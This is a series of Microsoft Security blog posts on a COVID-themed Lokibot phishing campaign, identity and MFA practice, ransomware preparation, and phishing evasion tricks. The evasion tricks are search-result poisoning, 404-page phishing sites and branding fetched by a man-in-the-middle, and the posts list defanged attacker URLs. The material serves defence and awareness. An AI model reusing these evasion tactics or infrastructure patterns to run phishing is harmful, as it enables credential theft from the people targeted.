Once a file or URL is identified as malicious, the information is shared with other services such as Microsoft Defender Advanced Threat Protection (ATP) to ensure endpoint detection benefits from email detection, and vice versa.

An interesting example of this in action occurred earlier this month, when an attacker launched a spear-phishing campaign that lasted less than 30 minutes.

Attackers crafted an email designed to look like a legitimate supply chain risk report for food coloring additives with an update based on disruptions due to coronavirus. The attachment, however, was malicious and delivered a sophisticated, multi-layer payload based on the Lokibot trojan (Trojan:Win32/Lokibot.GJ!MTB).

Screenshot of a phishing email about a coronavirus update.

Had this payload been successfully deployed, hackers could have used it to steal credentials for other systems—in this case FTP accounts and passwords—which could then be used for further attacks.

Only 135 customer tenants were targeted, with a spray of 2,047 malicious messages, but no customers were impacted by the attack. The Office 365 ATP detonation service, signal-sharing across services, and human analysts worked together to stop it.

And thanks to signal sharing across services, customers not using a Microsoft email service like Office 365, hosted Exchange, or Outlook.com, but using a Windows PC with Microsoft Defender enabled, were fully protected. When a user attempted to open the malicious attachment from their non-Microsoft email service, Microsoft Defender kicked in, querying its cloud-based machine learning models and found that the attachment was blocked based on a previous Office 365 ATP cloud detection. The attachment was prevented from executing on the PC and the customer was protected.

What you can do

While bad actors are attempting to capitalize on the COVID-19 crisis, they are using the same tactics they always do. You should be especially vigilant now to take steps to protect yourself.

Make sure your devices have the latest security updates installed and an antivirus or anti-malware service. For Windows 10 devices, Microsoft Defender Antivirus is a free built-in service enabled through Settings. Turn on cloud-delivered protection and automatic sample submission to enable artificial intelligence (AI) and machine learning to quickly identify and stop new and unknown threats.

Enable the protection features of your email service. If you have Office 365, you can learn about Exchange Online Protection here and Office 365 ATP here.

Use multi-factor authentication (MFA) on all your accounts. Most online services now provide a way to use your mobile device or other methods to protect your accounts in this way. Here’s information on how to use Microsoft Authenticator and other guidance on this approach.

MFA support is available as part of the Azure Active Directory (Azure AD) Free offering. Learn more here.

Educate yourself, friends, and colleagues on how to recognize phishing attempts and report suspected encounters. Here are some of the tell-tale signs.

  • Spelling and bad grammar. Cybercriminals are not known for their grammar and spelling. Professional companies or organizations usually have an editorial staff to ensure customers get high-quality, professional content. If an email message is fraught with errors, it is likely to be a scam.
  • Suspicious links. If you suspect that an email message is a scam, do not click on any links. One method of testing the legitimacy of a link is to rest your mouse—but not click—over the link to see if the address matches what was typed in the message. In the following example, resting the mouse on the link reveals the real web address in the box with the yellow background. Note that the string of IP address numbers looks nothing like the company’s web address.

  • Suspicious attachments. If you receive an email with an attachment from someone you don’t know, or an email from someone you do know but with an attachment you weren’t expecting, it may be a phishing attempt, so we recommend you do not open any attachments until you have verified their authenticity. Attackers use multiple techniques to try and trick recipients into trusting that an attached file is legitimate.
    • Do not trust the icon of the attachment.
    • Be wary of multiple file extensions, such as “pdf.exe” or “rar.exe” or “txt.hta”.
    • If in doubt, contact the person who sent you the message and ask them to confirm that the email and attachment are legitimate.
  • Threats. These types of emails cause a sense of panic or pressure to get you to respond quickly. For example, it may include a statement like “You must respond by end of day.” Or saying that you might face financial penalties if you don’t respond.
  • Spoofing. Spoofing emails appear to be connected to legitimate websites or companies but take you to phony scam sites or display legitimate-looking pop-up windows.
  • Altered web addresses. A form of spoofing where web addresses that closely resemble the names of well-known companies, but are slightly altered; for example, “www.micorsoft.com” or “www.mircosoft.com”.
  • Incorrect salutation of your name.
  • Mismatches. The link text and the URL are different from one another; or the sender’s name, signature, and URL are different.

If you think you’ve received a phishing email or followed a link in an email that has taken you to a suspicious website, there are few ways to report what you’ve found.

If you think the mail you’ve received is suspicious:

  • Outlook.com. If you receive a suspicious email message that asks for personal information, select the checkbox next to the message in your Outlook inbox. Select the arrow next to Junk, and then point to Phishing scam.
  • Microsoft Office Outlook 2016 and 2019 and Microsoft Office 365. While in the suspicious message, select Report message in the Protection tab on the ribbon, and then select Phishing.

If you’re on a suspicious website:

  • Microsoft Edge. While you’re on a suspicious site, select the More (…) icon > Send feedback > Report Unsafe site. Follow the instructions on the web page that displays to report the website.
  • Internet Explorer. While you’re on a suspicious site, select the gear icon, point to Safety, and then select Report Unsafe Website. Follow the instructions on the web page that displays to report the website.

If you think you have a suspicious file:

  • Submit the file for analysis.

This is just one area where our security teams at Microsoft are working to protect customers and we’ll share more in the coming weeks. For additional information and best practices for staying safe and productive through remote work, community support and education during these challenging times, visit Microsoft’s COVID-19 resources page for the latest information.

The post Protecting against coronavirus themed phishing attacks appeared first on Microsoft Security.

Changing the Monolith—Part 4: Quick tech wins for a cloud-first world

February 13th, 2020 No comments

You may have heard that identity is the “new” perimeter. Indeed, with the proliferation of phishing attacks over the past few years, one of the best ways to secure data is to ensure that identity—the primary way we access data—can be trusted.

How do we secure identity?

Start by evaluating how users are authenticating to all applications inside and outside the organization. I say all applications, because it doesn’t take much effort for a hacker to pivot from a low-value, non-sensitive application to a high-value and highly-sensitive application, quickly gaining access to confidential or restricted data.

Similarly, Multi-Factor Authentication (MFA) must be enforced for all users as well, not just highly privileged users. Remember that it is simple for bad actors to pass-the-hash, run a Golden Ticket Attack, or use other techniques to elevate their privileges and gain access to sensitive data.

Modern authentication encourages us to reduce vulnerable legacy authentication methods, including Kerberos and NTLM. Additionally, modern authentication requires that we rely on more than one factor of authentication for all users. These factors range from something you know (password or one-time password), something you have (hardware token or soft token), or something you are (biometrics like 3D facial recognition or fingerprint matching).

Image of a worker approving a sign-in from his phone.

Start with MFA.

Requiring MFA for all applications, whether on-premises or in the cloud, is a great start. When using MFA, consider enforcing an authenticator app or a one-time password mechanism as they are typically not as susceptible to man-in-the-middle attacks, compared to text-back codes or phone calls that may be intercepted with spoofing.

The least vulnerable MFA mechanisms include FIDO2, which utilizes a biometric device or USB hardware token like YubiKey, and machine learning systems that can provide conditional access based on Zero Trust and time-of-authentication context.

Here is the context commonly evaluated by machine learning authentication systems:

  • Can an authentication token be obtained?
  • Does the user have a valid username, password, and a second form of authentication (MFA), like a biometric validation (fingerprint or 3D facial recognition) through an authenticator app?
  • What is the risk score of the user?
  • Is the user authenticating from two places at nearly the same time (Impossible Traveler)?
  • Has the user’s password been discovered on the Dark Web because of an account and password database breach?
  • Is this a reasonable time for the user to be signed in based upon past behavior?
  • Is the user signing-in from an anonymous source like a Tor exit node?
  • What is the risk score of the device?
  • Has the device experienced unresolved risk in the last several days?
  • Has the machine been exposed to malware?
  • Is the machine running a high-risk application?
  • Are the antimalware signatures up to date?
  • Are all the critical and high software patches applied?
  • Are there sensitive documents on the device?

With the enforcement of MFA, a single, unified MFA reduces the success of phishing attacks due to password reuse or social engineering. With web-based Authentication-as-a-Service (AaaS) applications, MFA is easy to implement across the enterprise. Modern operating systems now enforce multifactor authentication by default, including Windows 10 Hello, macOS, iOS, and Android. Most modern on-premises and cloud applications should be able to consume SSO authentication standards like SAML or OpenID and OAth2 authorization.

Moving toward a secure SSO posture

Implementing a single identity source for all applications leads the organization to a better and less time-consuming and complicated user experience, and an arguably more secure SSO posture by:

  • Reducing the number of passwords that users need to remember or save—quite often insecurely—to access their applications.
  • Introducing pass-through authentication and authorization, so that once a user authenticates to an operating system, they have unprompted access to both on-premises and cloud apps, using the same security token created when they signed in to the operating system using MFA.
  • Reducing the threat of untimely termination/missed identity decommissioning by decreasing “identity sprawl,” which is what you encounter when your organization has multiple identities in multiple applications per user. That is sometimes the result of non-integrated entities or not yet integrated entities and affiliates. B2B approaches to SSO can be explored to solve the problems associated with not integrating a business unit or operating group into the organization’s core directory.

Image of a hand hovering over a keyboard.

Considering user satisfaction is critical.

MFA and SSO together increases user satisfaction, making the CISO a business enabler rather than a productivity and collaboration roadblock. Cloud-based MFA and SSOP directory systems have been shown to be more available than on-premises directory or federation services with many cloud providers providing 99.9 percent uptime. A three-nines Service Level Agreement (SLA) is challenging to achieve on-premises with limited IT staff and budget!

Stay tuned

Stay tuned for the next installment of my Changing the Monolith series. In the meantime, check out the first three posts in the series:

Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the Monolith—Part 4: Quick tech wins for a cloud-first world appeared first on Microsoft Security.

Ransomware response—to pay or not to pay?

December 16th, 2019 No comments

The increased connectivity of computers and the growth of Bring Your Own Device (BYOD) in most organizations is making the distribution of malicious software (malware) easier. Unlike other types of malicious programs that may usually go undetected for a longer period, a ransomware attack is usually experienced immediately, and its impact on information technology infrastructure is often irreversible.

As part of Microsoft’s Detection and Response Team (DART) Incident Response engagements, we regularly get asked by customers about “paying the ransom” following a ransomware attack. Unfortunately, this situation often leaves most customers with limited options, depending on the business continuity and disaster recovery plans they have in place.

The two most common options are either to pay the ransom (with the hopes that the decryption key obtained from the malicious actors works as advertised) or switch gears to a disaster recovery mode, restoring systems to a known good state.

The unfortunate truth about most organizations is that they are often only left with the only option of paying the ransom, as the option to rebuild is taken off the table by lack of known good backups or because the ransomware also encrypted the known good backups. Moreover, a growing list of municipalities around the U.S. has seen their critical infrastructure, as well as their backups, targeted by ransomware, a move by threat actors to better guarantee a payday.

We never encourage a ransomware victim to pay any form of ransom demand. Paying a ransom is often expensive, dangerous, and only refuels the attackers’ capacity to continue their operations; bottom line, this equates to a proverbial pat on the back for the attackers. The most important thing to note is that paying cybercriminals to get a ransomware decryption key provides no guarantee that your encrypted data will be restored.

So, what options do we recommend? The fact remains that every organization should treat a cybersecurity incident as a matter of when it will happen and not whether it will happen. Having this mindset helps an organization react quickly and effectively to such incidents when they happen. Two major industry standard frameworks, the Sysadmin, Audit, Network, and Security (SANS) and the National Institute of Standards and Technology (NIST), both have published similar concepts on responding to malware and cybersecurity incidents. The bottom line is that every organization needs to be able to plan, prepare, respond, and recover when faced with a ransomware attack.

Outlined below are steps designed to help organizations better plan and prepare to respond to ransomware and major cyber incidents.

How to plan and prepare to respond to ransomware

1. Use an effective email filtering solution

According to the Microsoft Security Intelligence Report Volume 24 of 2018, spam and phishing emails are still the most common delivery method for ransomware infections. To effectively stop ransomware at its entry point, every organization needs to adopt an email security service that ensures all email content and headers entering and leaving the organization are scanned for spam, viruses, and other advanced malware threats. By adopting an enterprise-grade email protection solution, most cybersecurity threats against an organization will be blocked at ingress and egress.

2. Regular hardware and software systems patching and effective vulnerability management

Many organizations are still failing to adopt one of the age-old cybersecurity recommendations and important defenses against cybersecurity attacks—applying security updates and patches as soon as the software vendors release them. A prominent example of this failure was the WannaCry ransomware events in 2017, one of the largest global cybersecurity attacks in the history of the internet, which used a leaked vulnerability in Windows networking Server Message Block (SMB) protocol, for which Microsoft had released a patch nearly two months before the first publicized incident. Regular patching and an effective vulnerability management program are important measures to defend against ransomware and other forms of malware and are steps in the right direction to ensure every organization does not become a victim of ransomware.

3. Use up-to-date antivirus and an endpoint detection and response (EDR) solution

While owning an antivirus solution alone does not ensure adequate protection against viruses and other advanced computer threats, it’s very important to ensure antivirus solutions are kept up to date with their software vendors. Attackers invest heavily in the creation of new viruses and exploits, while vendors are left playing catch-up by releasing daily updates to their antivirus database engines. Complementary to owning and updating an antivirus solution is the use of EDR solutions that collect and store large volumes of data from endpoints and provide real-time host-based, file-level monitoring and visibility to systems. The data sets and alerts generated by this solution can help to stop advanced threats and are often leveraged for responding to security incidents.

4. Separate administrative and privileged credentials from standard credentials

Working as a cybersecurity consultant, one of the first recommendations I usually provide to customers is to separate their system administrative accounts from their standard user accounts and to ensure those administrative accounts are not useable across multiple systems. Separating these privileged accounts not only enforces proper access control but also ensures that a compromise of a single account doesn’t lead to the compromise of the entire IT infrastructure. Additionally, using Multi-Factor Authentication (MFA), Privileged Identity Management (PIM), and Privileged Access Management (PAM) solutions are ways to effectively combat privileged account abuse and a strategic way of reducing the credential attack surface.

5. Implement an effective application whitelisting program

It’s very important as part of a ransomware prevention strategy to restrict the applications that can run within an IT infrastructure. Application whitelisting ensures only applications that have been tested and approved by an organization can run on the systems within the infrastructure. While this can be tedious and presents several IT administrative challenges, this strategy has been proven effective.

6. Regularly back up critical systems and files

The ability to recover to a known good state is the most critical strategy of any information security incident plan, especially ransomware. Therefore, to ensure the success of this process, an organization must validate that all its critical systems, applications, and files are regularly backed up and that those backups are regularly tested to ensure they are recoverable. Ransomware is known to encrypt or destroy any file it comes across, and it can often make them unrecoverable; consequently, it’s of utmost importance that all impacted files can be easily recovered from a good backup stored at a secondary location not impacted by the ransomware attack.

Learn more and keep updated

Learn more about how DART helps customers respond to compromises and become cyber-resilient. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Ransomware response—to pay or not to pay? appeared first on Microsoft Security.

The quiet evolution of phishing

December 11th, 2019 No comments

The battle against phishing is a silent one: every day, Office 365 Advanced Threat Protection detects millions of distinct malicious URLs and email attachments. Every year, billions of phishing emails don’t ever reach mailboxes—real-world attacks foiled in real-time. Heuristics, detonation, and machine learning, enriched by signals from Microsoft Threat Protection services, provide dynamic, robust protection against email threats.

Phishers have been quietly retaliating, evolving their techniques to try and evade these protections. In 2019, we saw phishing attacks reach new levels of creativity and sophistication. Notably, these techniques involve the abuse of legitimate cloud services like those offered by Microsoft, Google, Amazon, and others. At Microsoft, we have aggressive processes to identify and take down nefarious uses of our services without affecting legitimate applications.

In this blog we’ll share three of the most notable attack techniques we spotted this year. We uncovered these attacks while studying Office 365 ATP signals, which we use to track and deeply understand attacker activity and build durable defenses against evolving and increasingly sophisticated email threats.

Hijacked search results lead to phishing

Over the years, phishers have become better at evading detection by hiding malicious artifacts behind benign ones. This tactic manifests in, among many others, the use of URLs that point to legitimate but compromised websites or multiple harmless-looking redirectors that eventually lead to phishing.

One clever phishing campaign we saw in 2019 used links to Google search results that were poisoned so that they pointed to an attacker-controlled page, which eventually redirected to a phishing page. A traffic generator ensured that the redirector page was the top result for certain keywords.

Figure 1. Phishing attack that used poisoned search results

Using this technique, phishers were able to send phishing emails that contained only legitimate URLs (i.e., link to search results), and a trusted domain at that, for example:

  • hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EhOJoXatrCPy%3C/a%3E
  • hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EyEg5xg1736iIgQVF%3C/a%3E

The campaign was made even stealthier by its use of location-specific search results. When accessed by users in Europe, the phishing URL led to the redirector website c77684gq[.]beget[.]tech, and eventually to the phishing page. Outside Europe, the same URL returned no search results.

For this to work, attackers had to make sure that their website, c77684gq[.]beget[.]tech, was the top search result for the keyword “hOJoXatrCPy” when queried from certain regions. The website’s HTML code is composed of a redirector script and a series of anchor elements:

Figure 2. Redirector code

These anchor elements were designed to be crawled by search engines so that the page is indexed and returned as result for the search keywords that attackers wanted to use for their campaign.

Figure 3. Anchor tags containing search keywords

The attackers then set up a traffic generator to poison search results. Because the phishing URL used the open redirector functionality, it redirected to the top search result, hence the redirector page.

404 Not Found pages customized to be phishing sites

The other way that phishers evade detection is to use multiple URLs and sometimes even multiple domains for their campaigns. They use techniques like subdomain generation algorithms to try and always get ahead of solutions, which, without the right dynamic technologies, will be forced continually catch up as phishers generate more and more domains and URLs.

This year, attackers have found another shrewd way to serve phishing: custom 404 pages. We uncovered a phishing campaign targeting Microsoft that used 404 pages crafted as phishing pages, which gave phishers virtually unlimited phishing URLs.

Figure 4. Phishing attack that uses specially crafted 404 Not Found error page

The custom 404 page was designed to look like the legitimate Microsoft account sign-in page.

Figure 5. 404 page designed as phishing page

Because the malformed 404 page is served to any non-existent URL in an attacker-controlled domain, the phishers could use random URLs for their campaigns. For example, we saw these two URLs used in phishing campaigns; the attackers added a single character to the second one to generate a new URL but serve the same phishing page:

  • hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#ZG1jY2FubkBtb3Jicm9zLmNvbQ
  • hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#ZG1jY2FubkBtb3Jicm9zLmNvbQs

We also found that the attackers randomized domains, exponentially increasing the number of phishing URLs:

  • outlookloffice365usertcph4l3q[.]web[.]app
  • outlookloffice365userdqz75j6h[.]web[.]app
  • outlookloffice365usery6ykxo07[.]web[.]app

All of these non-existent URLs returned the 404 error page, i.e., the phishing page:

Figure 6. When phishing URL is accessed, server responds with HTTP 404 error message, which is a phishing page

Man-in-the-middle component for dynamic phishing attack

Phishers have also been getting better at impersonation: the more legitimate the phishing emails looked, the better their chances at tricking recipients. Countless brands both big and small have been targets of spoofing by phishers.

One particular phishing campaign in 2019 took impersonation to the next level. Instead of attackers copying elements from the spoofed legitimate website, a man-in-the-middle component captured company-specific information like logos, banners, text, and background images from Microsoft’s rendering site.

Phishers sent out emails with URLs pointing to an attacker-controlled server, which served as the man-in-the-middle component and simulated Microsoft sign-in pages. The server identified certain specific information based on the recipient’s email address, including the target company, and then gathered the information specific to that company. The result was the exact same experience as the legitimate sign-page, which could significantly reduce suspicion.

Figure 7. Phishing attack that abuses Microsoft’s rendering site

Using the same URL, the phishing site was rendered differently for different targeted users. To generate legitimate-looking phishing sites, the server used the following code to retrieve the banner used by the target’s victim company as identified by the domain information in the email address; the response is the URL for the company banner:

Figure 8. Code snippet for requesting the banner

The server also retrieved the text used in the company’s sign-in page; the response is the actual text specific to the target victim’s company:

Figure 9. Code snippet for requesting the company-specific text

To complete the legitimate-looking phishing page, the server requested the background image using the code below; the response is the URL to the image:

Figure 10. Codes snippets for requesting background image

Office 365 ATP: Durable and dynamic defense for evolving email threats

The phishing techniques that we discussed in this blog are vastly different from each, but they are all clever attempts to achieve something that’s very important for phishers and other cybercrooks: stealth. The longer phishers can quietly hide from security solutions, the more chances they have to invade inboxes and trick people into divulging sensitive information.

To hunt down phishing and other threats that don’t want to be found, Office 365 ATP uses advanced security technologies that expose sophisticated techniques. Our URL detonation technology can follow the attack chain so it can detect threats even if they hide behind legitimate services and multiple layers of redirectors.

This rich visibility into email threats allows Office 365 ATP to continuously inform and improve its heuristic and machine learning protections so that new and emerging campaigns are blocked in real-time—silently protecting customers from attacks even when they don’t know it. The insights from Office 365 ATP also allow our security experts to track emerging techniques and other attacker activities like the ones we discussed in this blog, allowing us to ensure that our protections are effective not just for the campaigns that we see today but those that might emerge in the future.

In addition, with the new campaign views in Office 365 ATP currently in preview, enterprises can get a broad picture of email campaigns observed in their network, with details like when the campaign started, the sending pattern and timeline, the list of IP addresses and senders used in the attack, which messages were blocked or otherwise, and other important information.

As an important component of Microsoft Threat Protection, Office 365 ATP provides critical security signals about threat that arrive via email—a common entry point for cyberattacks—to the rest of Microsoft’s security technologies, helping provide crucial protection at the early stages of attacks. Through signal-sharing and remediation orchestration across security solutions, Microsoft Threat Protection provides comprehensive and integrated protection for identities, endpoints, user data, apps, and infrastructure.

 

Patrick Estavillo
Office 365 ATP Research Team

 

 

 


Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post The quiet evolution of phishing appeared first on Microsoft Security.